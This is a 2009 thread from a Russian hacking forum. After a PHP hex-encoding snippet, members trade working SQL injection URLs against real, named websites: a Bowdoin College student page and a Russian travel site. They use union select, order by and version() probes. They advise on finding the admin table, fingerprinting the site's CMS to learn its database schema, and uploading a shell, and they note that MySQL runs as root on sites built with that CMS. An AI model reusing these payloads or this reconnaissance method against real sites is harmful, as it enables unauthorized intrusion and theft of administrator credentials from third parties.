HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.02.2009, 20:50
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Цитата:
Сообщение от f1ng3r  
чем лучше переводить текс в хек ... дайте ссылочку ... и лутче онлайн
PHP код:
<?
$n
="Тут текст, который надо захексить"
echo 
"0x".bin2hex($n);
?>
 
Ответить с цитированием

  #2  
Старый 17.02.2009, 20:53
[JavaScript]
Познающий
Регистрация: 14.02.2009
Сообщений: 45
С нами: 9072487

Репутация: 74
По умолчанию

f1ng3r, специально для тебя написал http://yandexclub.ru/hack/hex.php
 
Ответить с цитированием

  #3  
Старый 17.02.2009, 20:59
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
С нами: 9314306

Репутация: 325
По умолчанию

f1ng3r
http://noxak.ru/tools/ - тут много во что перевести можно... вобщем отличная вещь!
 
Ответить с цитированием

  #4  
Старый 18.02.2009, 07:14
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

Цитата:
http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+unoin+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*
что думаете?
 
Ответить с цитированием

  #5  
Старый 18.02.2009, 09:47
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами: 9196401

Репутация: 930
По умолчанию

Цитата:
Сообщение от sabe  
что думаете?
Цитата:
http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+unoin+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*
долго ломал голову что там)))
после этого запроса все стало понятно
Код:
http://studorgs.bowdoin.edu/meddies/news.php?nid=10+and+substring(version(),1,1)=3/*
3 ветка,поэтому вывода нет (union введён с четвётой версии mysql)

p.s там вроде 8 полей) а не 18
Код:
http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+order+by+8/*

Последний раз редактировалось z00MAN; 18.02.2009 в 10:28..
 
Ответить с цитированием

  #6  
Старый 18.02.2009, 15:11
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
С нами: 9591697

Репутация: 96
По умолчанию

Помогите найти табличку с админами...
Цитата:
http://www. travelwings .ru/article.php?id_article=-5+union+select+1,2,3,4,5,6,7,8,9,0,1/*
 
Ответить с цитированием

  #7  
Старый 18.02.2009, 15:53
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию

Думаю, что тебе поможет брутер+список названия таблиц...
 
Ответить с цитированием

  #8  
Старый 18.02.2009, 15:59
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от -m0rgan-  
Думаю, что тебе поможет брутер+список названия таблиц...
Можно и так, но есть способ лучше

Заходим в админку:
http://www.travelwings.ru/admin/login.php
Видим вверху надпись:
Citrus CMS v2.0
Гуглим и находим офф сайт этой цмс:
http://citrus-soft.ru
Видим. что она платная, значит с кодом обламываемся , но в портфолио присутствуют ещё сайты на этом движке, и существует вероятность найти пятую ветку и посмотреть структуру базы. Удачи
 
Ответить с цитированием

  #9  
Старый 18.02.2009, 17:13
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

Цитата:
Сообщение от jokester  
Можно и так, но есть способ лучше

Заходим в админку:
http://www.travelwings.ru/admin/login.php
Видим вверху надпись:
Citrus CMS v2.0
Гуглим и находим офф сайт этой цмс:
http://citrus-soft.ru
Видим. что она платная, значит с кодом обламываемся , но в портфолио присутствуют ещё сайты на этом движке, и существует вероятность найти пятую ветку и посмотреть структуру базы. Удачи
Да CMS платная, но у них инъекция в этой CMS. И самое, что интересное - на их сайте MySQL крутится из под рута. Пытался залить шелл, но видно пропалили... Сейчас инъекция просто на пустую страницу вываливает. И все портфолио которые сделаны на базе этой CMS - дырявые.
 
Ответить с цитированием

  #10  
Старый 18.02.2009, 17:27
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от groundhog  
Да CMS платная, но у них инъекция в этой CMS. И самое, что интересное - на их сайте MySQL крутится из под рута. Пытался залить шелл, но видно пропалили... Сейчас инъекция просто на пустую страницу вываливает. И все портфолио которые сделаны на базе этой CMS - дырявые.
Вообще-то я об этом и писал, в портфолио тоже есть и пятая ветка , и рут, но видимо админы не дремлют(я полагаю туда народ ломанулся толпой ), т.к. сейчас у меня тоже запрос не проходит
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.